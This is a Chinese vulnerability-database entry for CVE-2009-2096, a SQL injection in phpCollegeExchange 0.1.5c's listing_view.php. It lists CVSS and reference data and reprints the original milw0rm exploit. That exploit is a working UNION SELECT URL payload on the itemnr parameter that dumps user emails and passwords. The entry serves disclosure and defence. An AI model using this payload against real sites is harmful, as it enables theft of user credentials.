david_degner phpcollegeexchange "listing_view.php" SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117963 漏洞类型 SQL注入
发布时间 2009-06-15 更新时间 2009-06-15
CVE编号 CVE-2009-2096 CNNVD-ID CNNVD-200906-284
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8962
https://www.securityfocus.com/bid/43927
https://cxsecurity.com/issue/WLB-2009060148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-284
|漏洞详情
phpCollegeExchange0.1.5c版本的house/listing_view.php中存在SQL注入漏洞。远程攻击者可以借助itemnr参数,执行任意SQL指令。
|漏洞EXP
#################################################################################################################
[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] Script homepage : http://phpcollegeex.sourceforge.net/

[+] SQL Injection 

   http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--

#################################################################################################################

# milw0rm.com [2009-06-15]
|受影响的产品
phpCollegeExchange phpCollegeExchange 0.1.5c
|参考资料

来源:MILW0RM
名称:8962
链接:http://www.milw0rm.com/exploits/8962
来源:SECUNIA
名称:35452
链接:http://secunia.com/advisories/35452